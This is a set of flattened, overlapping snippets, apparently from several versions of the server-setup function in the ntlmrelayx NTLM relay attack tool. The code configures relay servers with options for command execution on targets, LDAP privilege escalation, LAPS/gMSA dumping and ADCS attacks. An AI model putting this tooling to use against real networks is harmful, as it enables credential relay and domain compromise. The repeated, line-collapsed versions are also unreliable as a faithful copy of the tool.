def start_servers(options, threads): for server in RELAY_SERVERS: #Set up config c = NTLMRelayxConfig() c.setProtocolClients(PROTOCOL_CLIENTS) c.setRunSocks(options.socks, socksServer) c.setTargets(targetSystem) c.setExeFile(options.e) c.setCommand(options.c) c.setEnumLocalAdmins(options.enum_local_admins) c.setEncoding(codec) c.setMode(mode) c.setAttacks(PROTOCOL_ATTACKS) c.setLootdir(options.lootdir) c.setOutputFile(options.output_file) c.setLDAPOptions(options.no_dump, options.no_da, options.no_acl, options.no_validate_privs, options.escalate_user, options.add_computer, options.delegate_access, options.dump_laps, options.dump_gmsa, options.sid) c.setRPCOptions(options.rpc_mode, options.rpc_use_smb, options.auth_smb, options.hashes_smb, options.rpc_smb_port) c.setMSSQLOptions(options.query) c.setInteractive(options.interactive) c.setIMAPOptions(options.keyword, options.mailbox, options.all, options.imap_max) c.setIPv6(options.ipv6) c.setWpadOptions(options.wpad_host, options.wpad_auth_num) c.setSMB2Support(options.smb2support) c.setSMBChallenge(options.ntlmchallenge) c.setInterfaceIp(options.interface_ip) c.setExploitOptions(options.remove_mic, options.remove_target) c.setWebDAVOptions(options.serve_image) c.setIsADCSAttack(options.adcs) c.setADCSOptions(options.template) if server is HTTPRelayServer: c.setListeningPort(options.http_port) c.setDomainAccount(options.machine_account, options.machine_hashes, options.domain) elif server is SMBRelayServer: c.setListeningPort(options.smb_port) elif server is WCFRelayServer: c.setListeningPort(options.wcf_port) #If the redirect option is set, configure the HTTP server to redirect targets to SMB if server is HTTPRelayServer and options.r is not None: c.setMode('REDIRECT') c.setRedirectHost(options.r) #Use target randomization if configured and the server is not SMB if server is not SMBRelayServer and options.random: c.setRandomTargets(True) s = server(c) s.start() threads.add(s) return c
def start_servers(options, threads): for server in RELAY_SERVERS: #Set up config c = NTLMRelayxConfig() c.setProtocolClients(PROTOCOL_CLIENTS) c.setRunSocks(options.socks, socksServer) c.setTargets(targetSystem) c.setExeFile(options.e) c.setCommand(options.c) c.setEnumLocalAdmins(options.enum_local_admins) c.setEncoding(codec) c.setMode(mode) c.setAttacks(PROTOCOL_ATTACKS) c.setLootdir(options.lootdir) c.setOutputFile(options.output_file) c.setLDAPOptions(options.no_dump, options.no_da, options.no_acl, options.no_validate_privs, options.escalate_user, options.add_computer, options.delegate_access) c.setMSSQLOptions(options.query) c.setInteractive(options.interactive) c.setGPotatoStartUp(options.gpotato_startup) c.setIMAPOptions(options.keyword, options.mailbox, options.all, options.imap_max) c.setIPv6(options.ipv6) c.setWpadOptions(options.wpad_host, options.wpad_auth_num) c.setSMB2Support(options.smb2support) c.setInterfaceIp(options.interface_ip) c.setExploitOptions(options.remove_mic, options.remove_target) if server is HTTPRelayServer: c.setListeningPort(options.http_port) c.setDomainAccount(options.machine_account, options.machine_hashes, options.domain) elif server is SMBRelayServer: c.setListeningPort(options.smb_port) #If the redirect option is set, configure the HTTP server to redirect targets to SMB if server is HTTPRelayServer and options.r is not None: c.setMode('REDIRECT') c.setRedirectHost(options.r) #Use target randomization if configured and the server is not SMB #SMB server at the moment does not properly store active targets so selecting them randomly will cause issues if server is not SMBRelayServer and options.random: c.setRandomTargets(True) s = server(c) s.start() threads.add(s) return c
c.setIPv6(options.ipv6) c.setWpadOptions(options.wpad_host, options.wpad_auth_num) c.setInterfaceIp(options.interface_ip) #If the redirect option is set, configure the HTTP server to redirect targets to SMB if server is HTTPRelayServer and options.r is not None: c.setMode('REDIRECT') c.setRedirectHost(options.r) #Use target randomization if configured and the server is not SMB #SMB server at the moment does not properly store active targets so selecting them randomly will cause issues if server is not SMBRelayServer and options.random: c.setRandomTargets(True) if options.machine_account is not None and options.machine_hashes is not None and options.domain is not None: c.setDomainAccount( options.machine_account, options.machine_hashes, options.domain) elif (options.machine_account is None and options.machine_hashes is None and options.domain is None) is False: logging.error("You must specify machine-account/hashes/domain all together!") sys.exit(1) s = server(c) s.start() print "" logging.info("Servers started, waiting for connections") while True: try: sys.stdin.read() except KeyboardInterrupt: sys.exit(1) else:
c = NTLMRelayxConfig() c.setTargets(targetSystem) c.setExeFile(exeFile) c.setCommand(Command) c.setMode(mode) c.setAttacks(ATTACKS) c.setLootdir(lootdir) c.setOutputFile(options.output_file) #If the redirect option is set, configure the HTTP server to redirect targets to SMB if server is HTTPRelayServer and options.r is not None: c.setMode('REDIRECT') c.setRedirectHost(options.r) if options.machine_account is not None and options.machine_hashes is not None and options.domain is not None: c.setDomainAccount( options.machine_account, options.machine_hashes, options.domain) elif (options.machine_account is None and options.machine_hashes is None and options.domain is None) is False: logging.error("You must specify machine-account/hashes/domain all together!") sys.exit(1) s = server(c) s.start() print "" logging.info("Servers started, waiting for connections") while True: try: sys.stdin.read() except KeyboardInterrupt: sys.exit(1) else: